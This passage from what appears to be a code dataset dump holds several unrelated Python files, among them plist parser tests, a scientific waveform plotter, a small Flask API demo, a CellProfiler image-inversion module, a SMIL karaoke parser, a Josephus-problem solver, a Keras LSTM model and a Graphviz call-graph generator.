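        y = random.randint(0, FRAME_HEIGHT) // SNAKE_SIZE * SNAKE_SIZE + SNAKE_SIZE // 2 + WALL_WIDTH
        if (x, y) not in occupied_cells:
            return x, y

print(random_food({(15, 15)}))  # never returns the occupied cell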
self.fail(\"NotBinaryPlistException: %s\" % e)\n except InvalidPlistException as e:\n self.fail(\"InvalidPlistException: %s\" % e)\n \n def testUnicodeRoot(self):\n result = readPlist(data_path('unicode_root.plist'))\n self.assertEqual(result, \"Mirror's Edge\\u2122 for iPad\")\n \n def testEmptyUnicodeRoot(self):\n result = readPlist(data_path('unicode_empty.plist'))\n self.assertEqual(result, b\"\")\n \n def testSmallReal(self):\n result = readPlist(data_path('small_real.plist'))\n self.assertEqual(result, {b'4 byte real':0.5})\n \n def testKeyedArchiverPlist(self):\n \"\"\"\n Archive is created with class like this:\n @implementation Archived\n ...\n - (void)encodeWithCoder:(NSCoder *)coder {\n [coder encodeObject:@\"object value as string\" forKey:@\"somekey\"];\n }\n @end\n \n Archived *test = [[Archived alloc] init];\n NSData *data = [NSKeyedArchiver archivedDataWithRootObject:test]\n ...\n \"\"\"\n result = readPlist(data_path('nskeyedarchiver_example.plist'))\n self.assertEqual(result, {b'$version': 100000, \n b'$objects': \n [b'$null', \n {b'$class': Uid(3), b'somekey': Uid(2)}, \n b'object value as string', \n {b'$classes': [b'Archived', b'NSObject'], b'$classname': b'Archived'}\n ], \n b'$top': {b'root': Uid(1)}, b'$archiver': b'NSKeyedArchiver'})\n self.assertEqual(\"Uid(1)\", repr(Uid(1)))\n \nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_valid.py","file_name":"test_valid.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"522471110","text":"import sys\nimport argparse\nimport itertools\n\nimport numpy as np\nimport tables as tb\n\nfrom matplotlib import pylab as plt\n\n_colors = itertools.cycle([\"k\", \"c\", \"r\", \"g\", \"y\", \"b\", \"dimgrey\", \"chocolate\", \"m\", \"gold\", \"tomato\", \"lime\"])\n\ndef mode(data):\n unique_values, occurrences = np.unique(data, return_counts=True)\n return unique_values[np.argmax(occurrences)]\n\n\ndef customize_plot(zoomx, zoomy, wf_type, evt, elecid=None):\n title = (\"{} | Evt {}\" .format(wf_type, evt ) if elecid is None else\n \"{} | Evt {}, elecid {}\".format(wf_type, evt, elecid))\n\n\n plt.xlabel(\"Time bin\")\n plt.ylabel(\"Amplitude (adc)\")\n plt.title(title)\n\n if zoomx: plt.xlim(zoomx)\n if zoomy: plt.ylim(zoomy)\n if elecid is None: plt.legend()\n\n\ndef show_and_wait():\n plt.show()\n input(\"Press [enter] to continue\")\n plt.clf()\n\n\ndef plot_waveforms(waveforms, sensors, evt, *, wf_type=\"PMT\", range=(None,),\n overlay=False, sum=False,\n zoomx=False, zoomy=False, dual=False):\n range = slice(*range)\n\n wfsize = waveforms.shape[2]\n time = np.arange(wfsize).astype(float)\n if wf_type == \"PMT\" : time /= 40\n elif wf_type == \"BLR\" : time /= 40\n elif wf_type == \"SiPM\": pass\n else: raise ValueError(\"Unrecognized wf type {}. 
\".format(wf_type) + \n \"Valid options: are 'PMT', 'BLR' and 'SiPM'\")\n\n if sum: wf_type += \" SUM\"\n\n gmin, gmax = float(\"inf\"), -float(\"inf\")\n plt.ion()\n ax1 = plt.gca()\n if sum:\n sum_wf = np.zeros(waveforms.shape[2])\n\n if dual:\n for wf, wf_dual, ID, color in zip(waveforms[0][range], waveforms[1][range] , sensors[range], _colors):\n ymin, ymax = min(wf_dual), max(wf_dual)\n if ymin < gmin: gmin = ymin\n if ymax > gmax: gmax = ymax\n\n plt.plot(wf, drawstyle=\"steps\", label=str(ID[0]), c=color)\n plt.plot(wf_dual, drawstyle=\"steps\", label=str(ID[0]), c=next(_colors))\n\n ylim = (0.99 * ymin, 1.01 * ymax)\n customize_plot(zoomx, zoomy if zoomy else ylim, wf_type, evt, ID[0])\n show_and_wait()\n else:\n for wf, ID, color in zip(waveforms[0][range], sensors[range], _colors):\n ymin, ymax = min(wf), max(wf)\n if ymin < gmin: gmin = ymin\n if ymax > gmax: gmax = ymax\n\n if sum:\n bls_wf = wf - mode(wf)\n sum_wf = sum_wf + bls_wf * (1 if \"SiPM\" in wf_type else -1)\n else:\n plt.plot(wf, drawstyle=\"steps\", label=str(ID[0]), c=color)\n\n if not overlay and not sum:\n ylim = (0.99 * ymin, 1.01 * ymax)\n customize_plot(zoomx, zoomy if zoomy else ylim, wf_type, evt, ID[0])\n show_and_wait()\n\n if overlay:\n ylim = 0.99 * gmin, 1.01 * gmax\n customize_plot(zoomx, zoomy if zoomy else ylim, wf_type, evt)\n show_and_wait()\n\n if sum:\n ylim = np.min(sum_wf) - 50, np.max(sum_wf) + 50\n plt.plot(sum_wf, drawstyle=\"steps\", c=\"k\")\n customize_plot(zoomx, zoomy if zoomy else ylim, wf_type, evt)\n show_and_wait()\n\n\ndef plot_file(filename, rwf=True, blr=True, sipm=True, sipm_range=(None,),\n overlay=False, sum=False, first=0,\n zoomx=False, zoomy=False, dual=False, elecid=False):\n with tb.open_file(filename) as file:\n evt_step = 2 if dual else 1\n event_numbers = file.root.Run.events[:]\n if len(sipm_range) > 1:\n sipm_channels = file.root.Sensors.DataSiPM.cols.sensorID[:]\n if elecid:\n sipm_channels = file.root.Sensors.DataSiPM.cols.channel[:]\n start_idx = np.where(sipm_channels == sipm_range[0])[0][0]\n end_idx = np.where(sipm_channels == sipm_range[1])[0][0]\n sipm_range = (start_idx, end_idx)\n\n for evt in range(first, len(file.root.Run.events.cols.evt_number), evt_step):\n evt_number = event_numbers[evt][0]\n if rwf and \"RD/pmtrwf\" in file.root and \"Sensors/DataPMT\" in file.root:\n plot_waveforms(file.root.RD . pmtrwf [evt : evt+evt_step],\n file.root.Sensors.DataPMT [:],\n evt_number, wf_type=\"PMT\", overlay=overlay, sum=sum,\n zoomx=zoomx, zoomy=zoomy, dual=dual)\n if blr and \"RD/pmtblr\" in file.root and \"Sensors/DataBLR\" in file.root:\n plot_waveforms(file.root.RD . 
pmtblr [evt : evt+evt_step],\n file.root.Sensors.DataBLR [:],\n evt_number, wf_type=\"BLR\", overlay=overlay, sum=sum,\n zoomx=zoomx, zoomy=zoomy, dual=dual)\n if sipm and \"RD/sipmrwf\" in file.root and \"Sensors/DataSiPM\" in file.root:\n plot_waveforms(file.root.RD .sipmrwf [evt : evt + evt_step],\n file.root.Sensors.DataSiPM[:],\n evt_number, wf_type=\"SiPM\", range=sipm_range,\n overlay=overlay, sum=sum,\n zoomx=zoomx, zoomy=zoomy, dual=dual)\n\n\n#def _plot_waveform(waveforms, sensors):\n# nevts, nsensors, _ = waveforms.shape\n# for evt in range(nevts):\n## for evt in range(1):\n# for s in range(nsensors):\n## for s in range(640, 1000):\n## for s in range(128, 128 + 64):\n# data = waveforms[evt, s, :]\n# ymin = min(data)\n# ymax = max(data)\n# ymin = ymin - 0.1 * ymin\n# ymax = ymax + 0.1 * ymax\n#\n# title = \"Evt {}, elecid {}\".format(evt, sensors[s][0])\n#\n# plt.ion()\n# plt.plot(data, drawstyle='steps')\n# plt.ylim(ymin, ymax)\n# plt.title(title)\n# plt.show()\n# _ = input(\"Press [enter] to continue.\")\n# plt.clf()\n\nif __name__ == '__main__':\n def sipm_index(sensor_id):\n sensor_id = int(sensor_id)\n dice = sensor_id // 1000\n sipm_no = sensor_id % 1000\n return (dice - 1) * 64 + sipm_no\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--file\" , required=True)\n\n parser.add_argument( \"-pmt\" , action=\"store_true\")\n parser.add_argument( \"-blr\" , action=\"store_true\")\n parser.add_argument( \"-sipm\" , action=\"store_true\")\n #parser.add_argument(\"--sipm-range\", type=sipm_index, default=(None,), nargs=\"*\")\n parser.add_argument(\"--sipm-range\", type=int, default=(None,), nargs=\"*\")\n\n parser.add_argument(\"--overlay\" , action=\"store_true\")\n parser.add_argument(\"--sum\" , action=\"store_true\")\n parser.add_argument(\"--dual\" , action=\"store_true\")\n parser.add_argument(\"--first\" , type=int, default=0)\n parser.add_argument(\"--zoomx\" , type=int, default=(), nargs=\"*\")\n parser.add_argument(\"--zoomy\" , type=int, default=(), nargs=\"*\")\n parser.add_argument(\"--elecid\" , action=\"store_true\")\n\n args = parser.parse_args(sys.argv[1:])\n filename = args.file\n\n plot_file(filename,\n rwf=args.pmt, blr=args.blr, sipm=args.sipm, sipm_range=args.sipm_range,\n overlay=args.overlay, sum=args.sum, first=args.first,\n zoomx=args.zoomx, zoomy=args.zoomy, dual=args.dual, elecid=args.elecid)\n","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":7371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"382092288","text":"# Brian Lee \n# SoftDev1 pd6\n# K26 -- Getting More REST\n# 2018-11-15\n\nimport urllib\nimport json\nimport random\n\nfrom flask import Flask, render_template\n\napp = Flask(__name__)\n\nPROXY = \"149.89.1.30:3128\"\n\n@app.route('/')\ndef root():\n \n # Testing the xkcd API\n URL = \"https://xkcd.com/info.0.json\"\n req = urllib.request.Request(URL)\n\n try:\n resp = urllib.request.urlopen(req, None, 1)\n except urllib.error.URLError:\n req.set_proxy(PROXY, 'http')\n resp = urllib.request.urlopen(req, None, 3)\n\n xkcd_data = json.loads(resp.read())\n\n # Testing the Wikipedia API\n URL_STUB = \"https://en.wikipedia.org/w/api.php?\"\n PARAMS = {\n 'action': 'parse',\n 'page': 'Stuyvesant High School',\n 'section': 1,\n 'format': 'json',\n }\n URL = URL_STUB + urllib.parse.urlencode(PARAMS)\n req = urllib.request.Request(URL)\n\n try:\n resp = urllib.request.urlopen(req, None, 0.5)\n except urllib.error.URLError:\n req.set_proxy(PROXY, 
'http')\n resp = urllib.request.urlopen(req, None, 1)\n\n wiki_data = json.loads(resp.read())\n\n # Testing the Numbers API\n URL = \"http://numbersapi.com/random/math\"\n req = urllib.request.Request(URL)\n\n try:\n resp = urllib.request.urlopen(req, None, 0.5)\n except urllib.error.URLError:\n req.set_proxy(PROXY, 'http')\n resp = urllib.request.urlopen(req, None, 1)\n number_data = resp.read().decode()\n\n return render_template('main.html',\n xkcd=xkcd_data,\n number=number_data,\n wikipage=wiki_data['parse']['text']['*'],\n )\n\napp.debug=True\napp.run()\n","sub_path":"26_rrreeesssttt/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"547816190","text":"'''Invert For Printing inverts fluorescent images into \nbrightfield-looking images for printing.\n
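The Flask app above repeats the same try / set_proxy / retry sequence for each API call. A small helper capturing that pattern with urllib; PROXY and the timeouts mirror the values used above, and error handling is kept deliberately minimal:

import urllib.request
import urllib.error

PROXY = "149.89.1.30:3128"

def fetch(url, timeout=1, retry_timeout=3):
    # try a direct request first, then fall back to the proxy on failure
    req = urllib.request.Request(url)
    try:
        return urllib.request.urlopen(req, None, timeout).read()
    except urllib.error.URLError:
        req.set_proxy(PROXY, "http")
        return urllib.request.urlopen(req, None, retry_timeout).read()

# usage, mirroring the xkcd call in the route:
# xkcd_data = json.loads(fetch("https://xkcd.com/info.0.json"))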
\nThis module turns a single or multi-channel immunofluorescent-stained image\ninto an image that resembles a brightfield image stained with similarly\ncolored stains, which generally prints better.\n\nYou can operate on up to three grayscale images (representing\nthe red, green, and blue channels of a color image) or on an image that is\nalready a color image. The module can produce either three grayscale\nimages or one color image as output.\n\nIf you want to invert the grayscale intensities of an image, use ImageMath.\n'''\n\nimport numpy as np\n\nimport cellprofiler.cpimage as cpi\nimport cellprofiler.cpmodule as cpm\nimport cellprofiler.settings as cps\nfrom cellprofiler.settings import YES, NO\n\nCC_GRAYSCALE = \"Grayscale\"\nCC_COLOR = \"Color\"\nCC_ALL = [CC_COLOR, CC_GRAYSCALE]\nclass InvertForPrinting(cpm.CPModule):\n\n module_name = \"InvertForPrinting\"\n category = 'Image Processing'\n variable_revision_number = 1\n\n def create_settings(self):\n # Input settings\n self.input_color_choice = cps.Choice(\n \"Input image type\", CC_ALL, doc = \"\"\"\n Specify whether you are combining several grayscale images or\n loading a single color image.\"\"\")\n\n self.wants_red_input = cps.Binary(\n \"Use a red image?\",True, doc = \"\"\"\n Select %(YES)s to specify an image to use for the red channel.\"\"\"%globals())\n\n self.red_input_image = cps.ImageNameSubscriber(\n \"Select the red image\",cps.NONE)\n\n self.wants_green_input = cps.Binary(\n \"Use a green image?\",True, doc = \"\"\"\n Select %(YES)s to specify an image to use for the green channel.\"\"\"%globals())\n\n self.green_input_image = cps.ImageNameSubscriber(\n \"Select the green image\", cps.NONE)\n\n self.wants_blue_input = cps.Binary(\n \"Use a blue image?\", True, doc = \"\"\"\n Select %(YES)s to specify an image to use for the blue channel.\"\"\"%globals())\n\n self.blue_input_image = cps.ImageNameSubscriber(\n \"Select the blue image\", cps.NONE)\n\n self.color_input_image = cps.ImageNameSubscriber(\n \"Select the color image\", cps.NONE,doc = '''\n Select the color image to use.''')\n\n # Output settings\n self.output_color_choice = cps.Choice(\n \"Output image type\", CC_ALL, doc = \"\"\"\n Specify whether you want to produce several grayscale images or one color image.\"\"\")\n\n self.wants_red_output = cps.Binary(\n \"Select %(YES)s to produce a red image.\"%globals(), True)\n\n self.red_output_image = cps.ImageNameProvider(\n \"Name the red image\", \"InvertedRed\")\n\n self.wants_green_output = cps.Binary(\n \"Select %(YES)s to produce a green image.\"%globals(), True)\n\n self.green_output_image = cps.ImageNameProvider(\n \"Name the green image\", \"InvertedGreen\")\n\n self.wants_blue_output = cps.Binary(\n \"Select %(YES)s to produce a blue image.\"%globals(), True)\n\n self.blue_output_image = cps.ImageNameProvider(\n \"Name the blue image\", \"InvertedBlue\")\n\n self.color_output_image = cps.ImageNameProvider(\n \"Name the inverted color image\",\n \"InvertedColor\", doc = '''\n (Used only when producing a color output image)
\n Enter a name for the inverted color image.''')\n\n def settings(self):\n '''Return the settings as saved in the pipeline'''\n return [self.input_color_choice,\n self.wants_red_input, self.red_input_image,\n self.wants_green_input, self.green_input_image,\n self.wants_blue_input, self.blue_input_image,\n self.color_input_image,\n self.output_color_choice,\n self.wants_red_output, self.red_output_image,\n self.wants_green_output, self.green_output_image,\n self.wants_blue_output, self.blue_output_image,\n self.color_output_image]\n def help_settings(self):\n return [self.input_color_choice,\n self.wants_red_input, self.red_input_image,\n self.wants_green_input, self.green_input_image,\n self.wants_blue_input, self.blue_input_image,\n self.color_input_image,\n self.output_color_choice,\n self.color_output_image,\n self.wants_red_output, self.red_output_image,\n self.wants_green_output, self.green_output_image,\n self.wants_blue_output, self.blue_output_image ]\n\n def visible_settings(self):\n '''Return the settings as displayed in the UI'''\n result = [self.input_color_choice]\n if self.input_color_choice == CC_GRAYSCALE:\n for wants_input, input_image in \\\n ((self.wants_red_input, self.red_input_image),\n (self.wants_green_input, self.green_input_image),\n (self.wants_blue_input, self.blue_input_image)):\n result += [wants_input]\n if wants_input.value:\n result += [input_image]\n else:\n result += [self.color_input_image]\n result += [self.output_color_choice]\n if self.output_color_choice == CC_GRAYSCALE:\n for wants_output, output_image in \\\n ((self.wants_red_output, self.red_output_image),\n (self.wants_green_output, self.green_output_image),\n (self.wants_blue_output, self.blue_output_image)):\n result += [wants_output]\n if wants_output.value:\n result += [output_image]\n else:\n result += [self.color_output_image]\n return result\n\n def validate_module(self, pipeline):\n '''Make sure the user has at least one of the grayscale boxes checked'''\n if (self.input_color_choice == CC_GRAYSCALE and\n (not self.wants_red_input.value) and\n (not self.wants_green_input.value) and\n (not self.wants_blue_input.value)):\n raise cps.ValidationError(\"You must supply at least one grayscale input\",\n self.wants_red_input)\n\n def run(self, workspace):\n image_set = workspace.image_set\n shape = None\n if self.input_color_choice == CC_GRAYSCALE:\n if self.wants_red_input.value:\n red_image = image_set.get_image(\n self.red_input_image.value,\n must_be_grayscale=True).pixel_data\n shape = red_image.shape\n else:\n red_image = 0\n if self.wants_green_input.value:\n green_image = image_set.get_image(\n self.green_input_image.value,\n must_be_grayscale=True).pixel_data\n shape = green_image.shape\n else:\n green_image = 0\n if self.wants_blue_input.value:\n blue_image = image_set.get_image(\n self.blue_input_image.value,\n must_be_grayscale=True).pixel_data\n shape = blue_image.shape\n else:\n blue_image = 0\n color_image = np.zeros((shape[0],shape[1],3))\n color_image[:,:,0] = red_image\n color_image[:,:,1] = green_image\n color_image[:,:,2] = blue_image\n red_image = color_image[:,:,0]\n green_image = color_image[:,:,1]\n blue_image = color_image[:,:,2]\n elif self.input_color_choice == CC_COLOR:\n color_image = image_set.get_image(\n self.color_input_image.value,\n must_be_color=True).pixel_data\n red_image = color_image[:,:,0]\n green_image = color_image[:,:,1]\n blue_image = color_image[:,:,2]\n else:\n raise ValueError(\"Unimplemented color choice: %s\" %\n self.input_color_choice.value)\n 
inverted_red = (1 - green_image) * (1 - blue_image)\n inverted_green = (1 - red_image) * (1 - blue_image)\n inverted_blue = (1 - red_image) * (1 - green_image)\n inverted_color = np.dstack((inverted_red, inverted_green, inverted_blue))\n if self.output_color_choice == CC_GRAYSCALE:\n for wants_output, output_image_name, output_image in \\\n ((self.wants_red_output, self.red_output_image, inverted_red),\n (self.wants_green_output, self.green_output_image, inverted_green),\n (self.wants_blue_output, self.blue_output_image, inverted_blue)):\n if wants_output.value:\n image = cpi.Image(output_image)\n image_set.add(output_image_name.value, image)\n elif self.output_color_choice == CC_COLOR:\n image = cpi.Image(inverted_color)\n image_set.add(self.color_output_image.value, image)\n else:\n raise ValueError(\"Unimplemented color choice: %s\" %\n self.output_color_choice.value)\n\n if self.show_window:\n workspace.display_data.color_image = color_image\n workspace.display_data.inverted_color = inverted_color\n\n\n def display(self, workspace, figure):\n figure.set_subplots((2, 1))\n color_image = workspace.display_data.color_image\n inverted_color = workspace.display_data.inverted_color\n figure.subplot_imshow(0, 0, color_image, \"Original image\")\n figure.subplot_imshow(1, 0, inverted_color, \"Color-inverted image\",\n sharexy = figure.subplot(0,0))\n\n def upgrade_settings(self, setting_values, variable_revision_number,\n module_name, from_matlab):\n if from_matlab and variable_revision_number == 1:\n setting_values = [\n CC_GRAYSCALE, # input_color_choice\n setting_values[0] != cps.NONE, # wants_red_input\n setting_values[0], # red_input_image\n setting_values[1] != cps.NONE,\n setting_values[1],\n setting_values[2] != cps.NONE,\n setting_values[2],\n cps.NONE, # color\n CC_GRAYSCALE, # output_color_choice\n setting_values[3] != cps.NONE,\n setting_values[3],\n setting_values[4] != cps.NONE,\n setting_values[4],\n setting_values[5] != cps.NONE,\n setting_values[5],\n 'InvertedColor']\n from_matlab = False\n variable_revision_number = 1\n\n return setting_values, variable_revision_number, from_matlab\n","sub_path":"cellprofiler/modules/invertforprinting.py","file_name":"invertforprinting.py","file_ext":"py","file_size_in_byte":10936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"284708933","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nfrom xml.sax import make_parser\nfrom xml.sax.handler import ContentHandler\nfrom smallsmilhandler import SmallSMILHandler\nimport smallsmilhandler\nimport sys\nimport json\nfrom urllib.request import urlretrieve\n\n\nclass KaraokeLocal(SmallSMILHandler):\n\n def __init__(self, fich):\n parser = make_parser()\n cHandler = smallsmilhandler.SmallSMILHandler()\n parser.setContentHandler(cHandler)\n fich = open(sys.argv[1], 'r')\n parser.parse(fich)\n self.datos = cHandler.get_tags()\n\n def __str__(self):\n elem = ''\n for lista in self.datos:\n elem = lista[0]\n sublista = lista[1]\n for atributo in sublista:\n elem = elem + \"\\t\" + atributo + \"=\" + sublista[atributo] + \" \"\n print(elem + \"\\n\")\n return(elem)\n\n def to_json(self, fich, new_fich=\"\"):\n if new_fich == \"\":\n nf = fich[:fich.find('.')]\n else:\n nf = new_fich\n fich_json = open(nf + '.json', 'w')\n json.dump(self.datos, fich_json, sort_keys=True, indent=4, separators=(',', ':'))\n fich_json.close()\n\n def do_local(self):\n for lista in self.datos:\n sublista = lista[1]\n for atributo in sublista:\n if 
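The inversion just above maps each output channel to the product of the other two input channels' complements, e.g. R' = (1 - G)(1 - B). A standalone numpy check of two boundary cases — a black background turns white while a saturated stain keeps its hue, which is exactly the brightfield-like effect the module describes:

import numpy as np

def invert_px(px):
    r, g, b = px
    return np.array([(1 - g) * (1 - b),   # new red
                     (1 - r) * (1 - b),   # new green
                     (1 - r) * (1 - g)])  # new blue

print(invert_px(np.array([0.0, 0.0, 0.0])))  # [1. 1. 1.]: black background -> white
print(invert_px(np.array([0.0, 1.0, 0.0])))  # [0. 1. 0.]: a pure green stain stays green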
sublista[atributo][:7] == \"http://\":\n urlretrieve(sublista[atributo])\n print(sublista[atributo])\n url = sublista[atributo].split('/')\n sublista[atributo] = url[-1]\n print(sublista[atributo])\n\nif __name__ == \"__main__\":\n\n try:\n fich = sys.argv[1]\n karaoke = KaraokeLocal(fich)\n print(karaoke)\n karaoke.do_local()\n karaoke.to_json(fich)\n print(karaoke)\n\n except IndexError:\n sys.exit(\"Usage: python3 karaoke.py file.smil\")\n","sub_path":"karaoke.py","file_name":"karaoke.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"103995559","text":"__author__ = 'lenovo'\r\n\r\nclass LinkNode(object):\r\n def __init__(self,val):\r\n self.val = val\r\n self.next = None\r\n\r\nclass Link(object):\r\n def __init__(self):\r\n self.root = None\r\n\r\n def construct_tree(self,n):\r\n if n < 1:\r\n return None\r\n self.root = LinkNode(0)\r\n node = self.root\r\n for i in range(1,n):\r\n temp = LinkNode(i)\r\n node.next = temp\r\n node = temp\r\n node.next = self.root\r\n return self.root\r\n\r\ndef solution(node,n,m):\r\n while n:\r\n if n == 1:\r\n return node.val\r\n\r\n if m == 1:\r\n for _ in range(n-1):\r\n node = node.next\r\n return node.val\r\n\r\n for _ in range(m-2):\r\n node = node.next\r\n\r\n temp = node.next.next\r\n node.next = temp\r\n node = temp\r\n n -= 1\r\n\r\nif __name__ == \"__main__\":\r\n link = Link()\r\n n=50\r\n m=20\r\n print(solution(link.construct_tree(n),n,m)) #33\r\n n=4\r\n m=3\r\n print(solution(link.construct_tree(n),n,m)) #0\r\n n=1\r\n m=1\r\n print(solution(link.construct_tree(n),n,m)) #44","sub_path":"Python剑指Offer/046_圆圈中最后剩下的数字(约瑟夫环)/046.py","file_name":"046.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"394404431","text":"from keras.models import Sequential\nfrom keras.layers import LSTM, Dense, Activation, Dropout\n'''\ndef caption_model(word_num, hidden_num, max_length):\n\n ratio = 0.5\n\n embed_id = layers.Embedding\n LSTM = layers.LSTM\n Drop = layers.Dropout\n\n model = Sequential()\n\n model.add(embed_id(word_num, hidden_num))\n model.add(Drop(ratio))\n model.add(LSTM(hidden_num, input_shape = (hidden_num)))\n model.add(Drop(ratio))\n\n return model\n'''\n\ndef motion_model(TIME, JOINTNUM, HIDDEN_NUM):\n\n model = Sequential()\n\n model.add(LSTM(HIDDEN_NUM, input_shape = (TIME,JOINT_NUM)))\n model.add(Dropout(0.5))\n model.add(Dense(2048))\n model.add(Dropout(0.5))\n model.add(Activation('softmax'))\n\n model.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\n model.summary()\n\n\n with open('motion_caption_model.json','w') as fp:\n json_string = model.to_json()\n fp.write(json_string)\n\n return model\n","sub_path":"motion_caption/src/motion_caption_model.py","file_name":"motion_caption_model.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"186168518","text":"import string, os, sys\r\n\r\nclass CodeGraph(object):\r\n\tdef __init__(self, \r\n\t\t\t\tresultsArray = [],\r\n\t\t\t\tfuncNameArray = [],\r\n\t\t\t\tfuncResDict = {},\r\n\t\t\t\toutputFileName = None,\r\n\t\t\t\tpath = None,\r\n\t\t\t\tsourcefiles = [],\r\n\t\t\t\t):\r\n\t\tsuper(CodeGraph, self).__init__()\r\n\t\t \r\n\t\tself.resultsArray = resultsArray\r\n\t\tself.funcNameArray = funcNameArray\r\n\t\tself.outputFileName = 
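The Josephus record above (problem 046) simulates the circle with a linked list in O(n·m). The same survivor index follows from the classic recurrence f(1) = 0, f(n) = (f(n-1) + m) mod n in O(n) time and O(1) space; note the n=1 case yields 0, which matches what the linked-list code actually returns (its "#44" comment appears to be a leftover):

def josephus(n, m):
    # f(1) = 0; f(k) = (f(k-1) + m) % k for k = 2..n
    survivor = 0
    for size in range(2, n + 1):
        survivor = (survivor + m) % size
    return survivor

print(josephus(50, 20))  # 33, matching the linked-list version
print(josephus(4, 3))    # 0
print(josephus(1, 1))    # 0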
outputFileName\r\n\t\tself.funcResDict = funcResDict\r\n\t\tself.path = path\r\n\t\tself.sourcefiles = sourcefiles\r\n\r\n\r\n\tdef coverageOutputGather(self):\r\n\t\tfile = open(self.outputFileName, 'r')\r\n\t\tfor line in file:\r\n\t\t\tif '.py' in line[-4:]:\r\n\t\t\t\tself.funcNameArray.append(line[:-1])\r\n\t\t\tif 'result :' in line:\r\n\t\t\t\tself.resultsArray.append(line[-2:-1])\r\n\t\tprint(self.funcNameArray)\r\n\t\tprint(self.resultsArray)\t \r\n\t\t#return funcNameArray,resultsArray\r\n\t\t \r\n\tdef dot_to_png(self):\r\n\t\tfiles = os.listdir(self.path) \r\n\t\tfor f in files:\r\n\t\t\tif f[-3:]==\"dot\": \r\n\t\t\t\tinputname = os.path.realpath(f)\r\n\t\t\t\toutputname = inputname.replace(\".dot\", \".png\")\r\n\t\t\t\tos.system('c:\\Program Files (x86)\\Graphviz\\bin\\dot.exe -Tpng \"' + os.path.realpath(f) + '\" -o \"' + outputname + '\"')\r\n\t\t\t\r\n\tdef dot_to_svg(self): \r\n\t\tfor f in os.listdir(self.path):\r\n\t\t\tif f[-3:]==\"dot\": \r\n\t\t\t\tinputname = os.path.join(self.path, f)\r\n\t\t\t\toutputname = inputname.replace(\".dot\", \".svg\")\r\n\t\t\t\t#print('C:\\Graphviz\\bin\\dot.exe -Tsvg \"' + inputname + '\" -o \"' + outputname + '\"')\r\n\t\t\t\tos.system('C:\\\\Graphviz\\\\bin\\\\dot.exe -Tsvg \"' + inputname + '\" -o \"' + outputname + '\"')\r\n\t\t\t\t\r\n\t\t\t\r\n\t\t \r\n\tdef traceToDotConversion(self):\r\n\t\tfor f in os.listdir(self.path): \r\n\t\t\t#print(self.path)\r\n\t\t\tif f[-5:] == 'ftest':\r\n\t\t\t\t#outpath = os.path.realpath(f) + '\\\\codeGraph'\r\n\t\t\t\toutname = os.path.join(self.path,f.replace(\".ftest\", \".dot\"))\r\n\t\t\t\toutputfile = open(outname , 'w')\r\n\t\t\t\toutputfile.write('digraph { \\n')\r\n\t\t\t\tinputfile = open(os.path.join('codeGraph',f), 'r')\r\n\t\t\t\tflow = 0\r\n\t\t\t\toutline = ''\r\n\t\t\t\tresultIndex = -1\r\n\t\t\t\tfor line in inputfile: \r\n\t\t\t\t\tsubline = line[:4]\r\n\t\t\t\t\tresultIndex = -1\r\n\t\t\t\t\tif '---' in subline:\t\t\t\t\t\r\n\t\t\t\t\t\tfuncIndex = line.find('funcname:')\r\n\t\t\t\t\t\t#print (funcIndex)\r\n\t\t\t\t\t\tfuncName = line[funcIndex+10:-1]\r\n\t\t\t\t\t\t#resultIndex = self.funcNameArray.index(funcName)\r\n\t\t\t\t\t\t#print (funcName)\r\n\t\t\t\t\t\tmodIndex = line.find('modulename:')\r\n\t\t\t\t\t\t#print (funcIndex)\r\n\t\t\t\t\t\tmodName = line[modIndex+12:funcIndex-2]\r\n\t\t\t\t\t\t#print (modName)\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\tif flow == 0:\r\n\t\t\t\t\t\t\tresultIndex = self.funcNameArray.index(funcName)\r\n\t\t\t\t\t\t\toutline = ' ' + funcName\r\n\t\t\t\t\t\t\tflow = 1\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\toutline = outline + ' -> ' + funcName\r\n\t\t\t\t\t\t\tif self.resultsArray[resultIndex] == 0:\r\n\t\t\t\t\t\t\t\toutline = outline + ' [color=green];\\n'\r\n\t\t\t\t\t\t\telif self.resultsArray[resultIndex] == 1:\r\n\t\t\t\t\t\t\t\toutline = outline + ' [color=red];\\n'\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\toutline = outline + ' [color=orange];\\n'\r\n\t\t\t\t\t\t\t#for mod in range(0,len(self.sourcefiles)):\r\n\t\t\t\t\t\t\t#\tif modName in self.sourcefiles[mod]:\r\n\t\t\t\t\t\t\toutputfile.write(outline)\r\n\t\t\t\t\t\t\toutline = ' ' + funcName\r\n\t\t\t\toutputfile.write('}')\r\n\t\t\t\toutputfile.close()\r\n\t\t\t\t\r\n\t\t\t\r\n","sub_path":"pTarantula/codeGraph.py","file_name":"codeGraph.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"464578410","text":"\n# coding: utf-8\n\n# In[60]:\n\n\nimport requests\nfrom bs4 import 
